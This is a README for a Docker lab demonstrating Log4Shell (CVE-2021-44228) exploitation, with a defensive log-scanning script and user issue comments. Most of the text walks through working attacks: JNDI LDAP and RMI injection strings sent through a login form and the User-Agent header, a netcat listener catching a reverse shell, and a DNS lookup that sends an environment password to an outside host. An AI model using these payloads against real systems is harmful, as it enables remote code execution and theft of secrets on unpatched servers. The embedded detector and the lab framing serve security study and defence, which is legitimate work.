An LDAP RCE exploit for CVE-2021-44228 Log4Shell

Overview

log4j-poc

Description

The demo Tomcat 8 server on port 8080 has a vulnerable app (log4shell) deployed on it, and the server is also vulnerable via user-agent attacks.

The remote exploit app in this demo is based on that found at https://github.com/kozmer/log4j-shell-poc

This demo Tomcat server (Tomcat 8.5.3, Java 1.8.0u51) has been reconfigured to use Log4J2 for logging, which is a non-standard configuration.

A newer Bitnami server is now available on port 8888. It is also configured for Log4J2 logging and is running Tomcat 9.0.55 and OpenJDK 11.0.13.

The RMI exploit against the Tomcat 9 / Java 11 server is described here: https://www.veracode.com/blog/research/exploiting-jndi-injections-java (Jan 3, 2019) by Michael Stepankin

The detection script will check for user-agent vulnerabilities and is from here: https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6

Prerequisites

This code requires Docker and Docker Compose.

Installation

git clone https://github.com/cyberxml/log4j-poc
cd log4j-poc
# edit docker-compose.yml to adjust the environment variables as needed.
#   POC_ADDR is the address of the cve-poc container
#   LISTENER_ADDR is the address of the 'nc' listener, e.g. the docker host
# The listener IP address is the address of the machine on which you will run the netcat 'nc' listener.
# This can be the local IP of the docker host machine.
docker-compose build

Run Web App Attack Demo

  1. Set up your nc listener on the docker host in the first terminal
    1. nc -lv 10.10.10.31 9001
  2. Start the docker containers in a second terminal
    1. docker-compose up
  3. Navigate to the web app on port 8080
    1. Navigate to http://10.10.10.31:8080/log4shell
      1. Enter the username: admin
      2. Enter the password: password
      3. Select the "login" button
      4. See the welcome screen
    2. Return to login at http://10.10.10.31:8080/log4shell
      1. Enter the username ${jndi:ldap://172.16.238.11:1389/a}
      2. Select the "login" button
      3. Check for connection on your nc listener

Run a User Agent Attack Demo

  1. Set up your nc listener on the docker host in the first terminal
    1. nc -lv 10.10.10.31 9001
  2. Start the docker containers in a second terminal
    1. docker-compose up
  3. In a third terminal, run the following. The second IP is the docker host.
    1. curl -A "\${jndi:ldap://172.16.238.11:1389/a}" http://10.10.10.31:8080/log4shell

Run a DNS Exfil Demo on Recent Java 11 version

  1. Start the docker containers in a terminal
    1. docker-compose up
  2. In a second terminal, run the following. The IP is the IP address of the docker host.
    1. curl -A "\${jndi:dns://10.10.10.31/\${env:POC_PASSWORD}}" http://10.10.10.31:8888/log4shell/
  3. The vulnerable web server will attempt to do a TXT lookup at the given IP. See log4j-dns_exfil.pcap.

Run an RMI RCE Demo on Recent Java 11 version

I am having issues with the command line arg for the ping target, so you have to compile it yourself.

Compile

  1. Start the docker containers in a terminal
    1. docker-compose up
  2. In another terminal, log in to the cve-poc container
    1. docker exec -it log4j-poc_cve-poc_1 /bin/bash
  3. Kill the running RMIServerPOC instance
  4. Change to rmi-poc directory
    1. cd /home/user/rmi-poc
  5. Edit RMIServerPOC.java to change 10.10.10.31 to your ping target
  6. Recompile
    1. javac -cp catalina.jar:. RMIServerPOC.java
  8. Run the server (java, not javac, runs the compiled class; the argument is the address the RMI server binds to)
    1. java -cp catalina.jar:. RMIServerPOC 127.0.0.1

Run RMI RCE Demo

  1. Start the docker containers in a terminal
    1. docker-compose up
  2. In a second terminal, run the following. The IP is the IP address of the docker host.
    1. curl -A "\${jndi:rmi://172.16.238.11:1097/Object}" http://10.10.10.31:8888/
  3. The vulnerable web server will download a malicious serialized object from the RMI server that references a class which already exists in the Tomcat environment.
  4. This will ping the IP address defined in the compile section.

Detect UA Vulnerability

  1. cd scripts
  2. python3 log4j_rce_check.py http://10.10.10.31:8080/log4shell --attacker-host 10.10.10.31:11389 --timeout=2
  3. You will have to kill the process; not sure yet why this hangs.
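A passive, defender-side check that runs over web-server access logs for the lookup strings exercised in the demos above (an added example, not code from the log4j-poc repository or the detection gist). It extracts each ${jndi:...} lookup brace-balanced, so the nested ${env:POC_PASSWORD} from the DNS exfil demo is captured whole and flagged as exfiltration rather than a plain callback; the log lines are constructed to mirror the demos.

```python
import re
from collections import namedtuple
from typing import List, Optional
# nested = inner lookups (e.g. "env:POC_PASSWORD") that resolve local data into the request.
JndiHit = namedtuple("JndiHit", "scheme host port path nested")
# Splits a lookup body of the form "<scheme>://<host>[:<port>][/path]".
HEAD = re.compile(r"(?P<scheme>[a-z]+)://(?P<host>[^:/]+)(?::(?P<port>\d{1,5}))?(?P<path>/.*)?$", re.I)

def extract_lookup(text: str, start: int) -> Optional[str]:
    """Return the brace-balanced ${...} at text[start], so a nested ${env:VAR} stays whole."""
    depth = 0
    for i in range(start, len(text)):
        if text.startswith("${", i):
            depth += 1
        elif text[i] == "}":
            depth -= 1
            if depth == 0:
                return text[start:i + 1]
    return None  # unterminated: not a well-formed lookup

def parse_jndi(lookup: str) -> Optional[JndiHit]:
    body = lookup[len("${jndi:"):-1]
    m = HEAD.match(body)
    if not m:
        return None
    nested = re.findall(r"\$\{([^${}]+)\}", body)
    return JndiHit(m["scheme"].lower(), m["host"],
                   int(m["port"]) if m["port"] else None, m["path"] or "", nested)

def find_jndi_lookups(line: str) -> List[JndiHit]:
    hits = []
    for m in re.finditer(r"\$\{jndi:", line, re.I):
        lookup = extract_lookup(line, m.start())
        if lookup and (hit := parse_jndi(lookup)):
            hits.append(hit)
    return hits

def scan_log(lines: List[str]):
    """(line_no, kind, hit) per lookup; kind is 'exfil' when the path embeds another lookup."""
    return [(n, "exfil" if hit.nested else "callback", hit)
            for n, line in enumerate(lines, 1) for hit in find_jndi_lookups(line)]

# Constructed Tomcat access-log lines mirroring the demos above (not a real capture).
SAMPLE_LOG = [
    '10.10.10.31 - - [06/Feb/2022:13:45:18 +0000] "GET /log4shell HTTP/1.1" 200 512 "-" "${jndi:ldap://172.16.238.11:1389/a}"',
    '10.10.10.31 - - [06/Feb/2022:13:46:02 +0000] "GET /log4shell/ HTTP/1.1" 200 512 "-" "${jndi:dns://10.10.10.31/${env:POC_PASSWORD}}"',
    '10.10.10.31 - - [06/Feb/2022:13:47:10 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:rmi://172.16.238.11:1097/Object}"',
    '10.10.10.31 - - [06/Feb/2022:13:48:00 +0000] "GET /log4shell HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]
```

Run it with `python -c "import detect; print(detect.scan_log(detect.SAMPLE_LOG))"` after saving it as detect.py, or feed real access-log lines to scan_log; the callback host and port in each hit are the values to block or hunt for.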
Comments
  • cve-neo: build Dockerfile http 503 Error : wget -S -c https://dlcdn.apache.org/maven/maven-3/3.8.4/binaries/apache-maven-3.8.4-bin.tar.gz

    wget Error 503 wget -S -c https://dlcdn.apache.org/maven/maven-3/3.8.4/binaries/apache-maven-3.8.4-bin.tar.gz --2022-02-06 13:45:18-- https://dlcdn.apache.org/maven/maven-3/3.8.4/binaries/apache-maven-3.8.4-bin.tar.gz Resolving dlcdn.apache.org (dlcdn.apache.org)... 151.101.2.132, 2a04:4e42::644 Connecting to dlcdn.apache.org (dlcdn.apache.org)|151.101.2.132|:443... connected. HTTP request sent, awaiting response... HTTP/1.1 503 Backend unavailable, connection timeout

    Solution: change to downloads.apache: RUN wget https://downloads.apache.org/maven/maven-3/3.8.4/binaries/apache-maven-3.8.4-bin.tar.gz

    opened by buchmann 1
  • Missing packet capture for RMI exploit

    I noticed you didn't have an example packet capture of a successful RMI exploit, so I've attached one to this issue.

    The relevant data is:

    • TCP stream 0: HTTP request with malicious lookup string in the user agent header
    • TCP stream 1: RMI initialization (?)
    • TCP stream 2: Malicious serialized Java object
    • TCP stream 3: Reverse shell communication

    rmi_exploit.pcap.zip

    opened by SeanPesce 0
  • Exploit.class did not connect to NC session 'nc -lv localhost 9001'

    Fix: Docker issue; I had to set a firewall rule to allow connections from the Exploit.class container to my local host, added in /etc/firewalld/zones/public.xml

    Restart the firewall: systemctl restart firewalld

    opened by buchmann 0